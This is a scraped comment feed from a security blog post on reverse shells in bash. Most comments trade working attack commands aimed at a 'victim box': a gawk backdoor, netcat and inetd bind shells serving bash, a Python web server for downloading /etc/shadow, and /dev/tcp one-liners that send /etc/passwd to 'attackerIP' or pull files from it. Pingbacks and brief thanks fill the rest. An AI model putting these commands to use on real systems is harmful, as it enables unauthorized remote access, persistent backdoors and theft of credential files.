Comments on: Reverse Shell with Bash http://www.gnucitizen.org/blog/reverse-shell-with-bash/ Information Security Think Tank Sat, 02 Feb 2013 17:50:40 +0000 hourly 1 http://wordpress.org/?v=3.4.1 By: Reverse Shell Cheat Sheet « 7shadan http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-133997 Reverse Shell Cheat Sheet « 7shadan Mon, 05 Mar 2012 15:48:26 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-133997 [...] versions of bash can send you a reverse shell (this was tested on Ubuntu [...] [...] versions of bash can send you a reverse shell (this was tested on Ubuntu [...]

]]> By: Guy http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-129730 Guy Fri, 18 Feb 2011 10:03:18 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-129730 I doubt whether this can be correct. The man page of nc mentions this w.r.t. to the <code>-l</code> option": "It is an error to use this <code>[l-]</code> option in conjunction with the <code>-p</code>, <code>-s</code>, or <code>-z</code> options." I doubt whether this can be correct.

The man page of nc mentions this w.r.t. to the -l option”: “It is an error to use this [l-] option in conjunction with the -p, -s, or -z options.”

]]> By: pdp http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-129143 pdp Sun, 26 Sep 2010 20:11:06 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-129143 not really! :) not really! :)

]]> By: revtan http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-128472 revtan Wed, 07 Apr 2010 01:43:57 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-128472 thanks for nice article... <pre><code>(macubergeek == pdp) ? ;-P : ;-|</code></pre> thanks for nice article…

(macubergeek == pdp)  ? ;-P : ;-|
]]> By: شل برعکسی! فقط برای لینوکسی‌ها! | خود خودمان http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-128120 شل برعکسی! فقط برای لینوکسی‌ها! | خود خودمان Wed, 27 Jan 2010 14:03:20 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-128120 [...] این روش را اینجا [...] [...] این روش را اینجا [...]

]]> By: » RT @sanand0: @jeffbarr Have a … Thej Live http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-128109 » RT @sanand0: @jeffbarr Have a … Thej Live Wed, 20 Jan 2010 10:42:40 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-128109 [...] @sanand0: @jeffbarr Have a look at http://matahari.sourceforge.net/ and http://www.gnucitizen.org/blog/reverse-shell-with-bash/ [...] [...] @sanand0: @jeffbarr Have a look at http://matahari.sourceforge.net/ and http://www.gnucitizen.org/blog.....with-bash/ [...]

]]> By: Reverse Shell | Computerglitch Research Project http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-128029 Reverse Shell | Computerglitch Research Project Tue, 08 Dec 2009 18:04:07 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-128029 [...] discussion on the subject can be seen here: http://www.gnucitizen.org/blog/reverse-shell-with-bash/. As you can see many interesting ways of achieving this goal have been [...] [...] discussion on the subject can be seen here: http://www.gnucitizen.org/blog.....with-bash/. As you can see many interesting ways of achieving this goal have been [...]

]]> By: pagvac http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-127536 pagvac Thu, 25 Jun 2009 12:19:06 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-127536 @Jeff: awesome. just tested it on my ubuntu workstation and works like a charm. thanks for sharing! @Jeff: awesome. just tested it on my ubuntu workstation and works like a charm. thanks for sharing!

]]> By: Jeff Price http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-127498 Jeff Price Wed, 17 Jun 2009 17:58:49 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-127498 2 way /dev/tcp communication on debian. Use netcat <pre><code>mkfifo mypipe cat mypipe|/bin/bash|nc -l -p 6000 >mypipe</code></pre> 2 way /dev/tcp communication on debian. Use netcat

mkfifo mypipe
cat mypipe|/bin/bash|nc -l -p 6000 >mypipe
]]> By: pdp http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-124302 pdp Mon, 10 Nov 2008 08:58:32 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-124302 this is quite interesting. thanks for sharing. this is quite interesting. thanks for sharing.

]]> By: vecna http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-124301 vecna Mon, 10 Nov 2008 08:53:42 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-124301 http://www.delirandom.net/20080323/ping-is-the-most-deployed-backdoor-on-the-net-omg/ the same prerequisite, but traffic is encoded in icmp. http://www.delirandom.net/2008.....e-net-omg/ the same prerequisite, but traffic is encoded in icmp.

]]> By: edward baddouh http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-123738 edward baddouh Tue, 16 Sep 2008 22:46:29 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-123738 nice work pdp, keep on going! nice work pdp, keep on going!

]]> By: macubergeek http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-122405 macubergeek Sun, 01 Jun 2008 16:37:33 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-122405 Python Trick If you can use a web app to execute shell commands on the victim: <pre><code>cd / && python -m SimpleHTTPServer</code></pre> then Python will start it's own web server listening on port 8000. You can surf to the victim on that port: <code>http://victim:8000</code> and then transverse the entire file system and download <code>/etc/passwd</code> and <code>/etc/shadow</code>. Tested on macos x 10.5.3 and Safari 3.1.1. For other *nix variants, your mileage may vary. Python Trick

If you can use a web app to execute shell commands on the victim:

cd / && python -m SimpleHTTPServer

then

Python will start it’s own web server listening on port 8000. You can surf to the victim on that port: http://victim:8000 and then transverse the entire file system and download /etc/passwd and /etc/shadow.

Tested on macos x 10.5.3 and Safari 3.1.1. For other *nix variants, your mileage may vary.

]]> By: macubergeek http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-122404 macubergeek Sun, 01 Jun 2008 16:34:36 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-122404 Yes exact citation for above is p62-0x08_Remote_Exec.txt "FIST! FIST! FIST! Its all in the wrist: Remote Exec" by grugg Yes exact citation for above is p62-0x08_Remote_Exec.txt “FIST! FIST! FIST! Its all in the wrist: Remote Exec” by grugg

]]> By: macubergeek http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-122387 macubergeek Fri, 30 May 2008 22:52:44 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-122387 Ok I know I know I'm obsessive ;-) Here is a reverse shell implemented in gawk Credit: Phrack 62 <pre><code>#!/usr/bin/gawk -f BEGIN { Port = 8080 Prompt = "bkd> " Service = "/inet/tcp/" Port "/0/0" while (1) { do { printf Prompt |& Service Service |& getline cmd if (cmd) { while ((cmd |& getline) > 0) print $0 |& Service close(cmd) } } while (cmd != "exit") close(Service) } }</pre></code> Ok I know I know I’m obsessive ;-) Here is a reverse shell implemented in gawk

Credit: Phrack 62

#!/usr/bin/gawk -f

BEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }
}
]]> By: macubergeek http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-122254 macubergeek Sun, 25 May 2008 19:15:40 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-122254 Ok here's some old skool stuff. To create a listener on a *nix box running inetd (as apposed to xinetd) <ul> <li>Pick an obscure service from <code>/etc/services</code> associated with a tcp port 1024 and above...for example laplink <pre><code>laplink 1547/tcp # laplink</code></pre></li> <li>Add the following line to <code>/etc/inetd.conf</code> <pre><code>laplink stream tcp nowait /bin/bash bash -i</code></pre></li> <li>restart <code>inetd.conf</code> <pre><code>killall -HUP inetd</code></pre></li> </ul> <strong>Explaination:</strong> You are creating a listener on port tcp/1547 that will shovel you a bash shell. <strong>Caveat:</strong> this obviously is not my *idea* It's just very VERY old stuff that still works. Ok here’s some old skool stuff. To create a listener on a *nix box running inetd (as apposed to xinetd)

  • Pick an obscure service from /etc/services associated with a tcp port 1024 and above…for example laplink 
    laplink         1547/tcp     # laplink
  • Add the following line to /etc/inetd.conf 
    laplink    stream  tcp     nowait  /bin/bash bash -i
  • restart inetd.conf 
    killall -HUP inetd

Explaination: You are creating a listener on port tcp/1547 that will shovel you a bash shell.

Caveat: this obviously is not my *idea* It’s just very VERY old stuff that still works.

]]> By: macubergeek http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-122233 macubergeek Sat, 24 May 2008 13:05:14 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-122233 BTW the /dev/tcp and /dev/udp is also a feature of the Korn shell. Korn shell is robust shell favored by *nix oldskoolers. You will find it installed by default on Mac OS X. I don't believe it comes default on the remainder of the BSDs(free and open). As far as I can tell it works pretty much the way it does under Bash. BTW the /dev/tcp and /dev/udp is also a feature of the Korn shell. Korn shell is robust shell favored by *nix oldskoolers. You will find it installed by default on Mac OS X. I don’t believe it comes default on the remainder of the BSDs(free and open). As far as I can tell it works pretty much the way it does under Bash.

]]> By: macubergeek http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-121307 macubergeek Fri, 09 May 2008 19:44:37 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-121307 Here is an important thing I just realized...d'oh this /dev/tcp/ thing can only connect outbound, it cannot listen and receive a connection like netcat. As far as I can tell ;-) Here is an important thing I just realized…d’oh this /dev/tcp/ thing can only connect outbound, it cannot listen and receive a connection like netcat. As far as I can tell ;-)

]]> By: macubergeek http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-120921 macubergeek Tue, 06 May 2008 09:36:27 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-120921 Transfer a file using HTTP: Say you have compromised a victim box and want to transfer a file to the victim. 1. Put the file in the web root of the attacker box (I'm thinking of the web server in backtrack. 2. Start up the web server on the attacker box 3. On the victim box do: <pre><code>(echo -e "GET /filename_you_are_moving HTTP/0.9\r\n\r\n" \ 1>&3 & cat 0<&3) 3 /dev/tcp/AttackerIP/80 \ | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; \ do read i; done; cat) > local_filename</code></pre> Credit where credit is due: http://www.pebble.org.uk/linux/bashbrowser Transfer a file using HTTP: Say you have compromised a victim box and want to transfer a file to the victim.

1. Put the file in the web root of the attacker box (I’m thinking of the web server in backtrack.
2. Start up the web server on the attacker box
3. On the victim box do:

(echo -e "GET /filename_you_are_moving HTTP/0.9\r\n\r\n" \
1>&3 & cat 0<&3) 3 /dev/tcp/AttackerIP/80 \
| (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; \
do read i; done; cat) > local_filename

Credit where credit is due:
http://www.pebble.org.uk/linux/bashbrowser

]]> By: macubergeek http://www.gnucitizen.org/blog/reverse-shell-with-bash/comment-page-1/#comment-120875 macubergeek Mon, 05 May 2008 23:45:26 +0000 http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-120875 Fun and games with <code>/dev/tcp</code> and file transfer: Ok here is how to use this bash <code>/dev/tcp</code> trick to move a file. <ol> <li>On attacker's box: I want to move a file named test.txt to the victim box<pre><code>cat test.txt | nc -l 3333</code></pre></li> <li>I'll then connect out from victim to attacker's port 3333 and pull back the file <code>test.txt</code><pre><code>bash -i >& /dev/tcp/attackersIP/8080 0>&1 > test.txt</code></pre></li> </ol> Advantages: netcat stays on the attacker's box. All I use on the victim box is what's already there...bash ;-) -------------------------------------- ok so you are probably saying "That's nice" but if I'm already on the victim and I want to say transfer /etc/password or /etc/shadow back to my attacker's box and I'm too lazy to do terminal copy and paste...then what? <ol> <li>on attacker's box do<pre><code>nc -l -p 8080 -vvv > passwd</code></pre></li> <li>on victim box do<pre><code>cat /etc/passwd > /dev/tcp/attackerIP/8080</code></pre></li> </ol> and like magic the victim's /etc/password is transferred to the attacker's box. Fun and games with /dev/tcp and file transfer: Ok here is how to use this bash /dev/tcp trick to move a file.

  1. On attacker’s box: I want to move a file named test.txt to the victim box 
    cat test.txt | nc -l 3333
  2. I’ll then connect out from victim to attacker’s port 3333 and pull back the file test.txt 
    bash -i >& /dev/tcp/attackersIP/8080 0>&1 > test.txt

Advantages: netcat stays on the attacker’s box. All I use on the victim box is what’s already there…bash ;-)

————————————–

ok so you are probably saying “That’s nice” but if I’m already on the victim and I want to say transfer /etc/password or /etc/shadow back to my attacker’s box and I’m too lazy to do terminal copy and paste…then what?

  1. on attacker’s box do 
    nc -l -p 8080 -vvv > passwd
  2. on victim box do 
    cat /etc/passwd > /dev/tcp/attackerIP/8080

and like magic the victim’s /etc/password is transferred to the attacker’s box.

]]>